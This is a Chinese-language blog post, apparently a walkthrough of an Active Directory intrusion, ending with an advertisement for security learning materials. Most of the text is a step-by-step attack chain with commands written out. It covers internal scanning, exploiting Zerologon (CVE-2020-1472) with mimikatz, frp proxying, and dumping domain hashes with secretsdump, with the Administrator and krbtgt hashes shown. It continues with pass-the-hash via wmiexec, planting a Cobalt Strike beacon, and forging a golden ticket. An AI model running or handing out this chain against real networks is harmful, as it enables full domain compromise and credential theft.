本文描述了一次黑客入侵过程,从获取最高权限,通过nbtscan和mimikatz工具进行内网扫描、漏洞利用,到利用wmiexec进行哈希传递和黄金票据制作。同时,提供了网络安全学习资源链接。
提权成功
拿下最高权限可以做后门权限维持,计划任务等等,这里就不多说了
最高权限也就代表这台主机是我们的了,那我们刚才看到了主机信息有三级域名,可以猜测有内网环境,我们进行网卡信息查看
指令:
shell ipconfig /all
可以看到有域环境,双网卡,DNS首选为10.10.3.6,这时候进行内网主机存活扫描,并获得上级域的计算机名和真实ip
这里用了nbtscan工具辅助扫描
查看扫描结果,主要看dc,为域控标志,这里要把计算机名字记录好,票据会用到
既然要做域横向移动那必须上传mimikatz
利用mimikatz扫一下有没有cve2020-1472漏洞
指令:
lsadump::zerologon /target:域控IP /account:域控主机名$
这里是存在的,因为内网和我们渗透机ip不在一个网段,是不能互通的,所以这里做下代理
我们把这两个文件上传
渗透机开启端口映射准备接收
利用cs将上传的响应启动,我们渗透机则显示连接成功
指令:
shell frpc.exe -c frp.ini
将kali的代理设置好,我们用7000端口接收碰撞,也就是在目标机上利用另一个端口连接流量
准备就绪开始利用cve进行置空域用户
指令:
shell mimikatz “lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit” “exit”
成功后我们在kali利用secretsdump进行无密码提出散列值,将管理员和krbtgt的哈希记录
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c696e9337845d8ada46612d047e40209
指令:
proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名$@域控ip
现在可以利用wmiexec进行哈希传递登录了
指令:
proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip
现在将三个文件拉出来保存在我们的本地
分别是sam,system,security
我们需要将域控恢复正常,不然无法正常访问
例如我们直接看虚拟机这,我直接输入正确密码都是错误的
我们先利用secretsdump将文件中的散列值提出,主要为了原本的机器码
指令:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
利用reinstall_original_pw进行还原
指令:
proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash
显示成功,我们可以直接来到虚拟机这里实验,直接登陆上来了
回到主轨,这时候我们先上线cs,直接用wmiexec哈希传递登录上传cs执行就可以了,但是要在cs这里做中转,相当于利用了外网的服务器做跳板,所以这里监听也写外网的内网网卡ip
将新生成的cs马启动
来到cs看到已经上线了
已经是最高权限了,这时候就是新的信息收集,这一部分忽略 我们知道还有父域的10.10.3.5所以我们要开始制作黄金票据了,首先上传mimikatz获取父子域的sid(就像实名制会员卡一人一张,计算机也一样)
指令:
shell mimikatz “privilege::debug” “lsadump::lsa /patch /user:administrator$” “lsadump::trust /patch” “exit”
黄金票据的几个要点我用txt列出来了
指令:
shell “kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209 /ptt” “exit”
进行票据攻击,显示成功
但是去响应却失败
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
1855
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
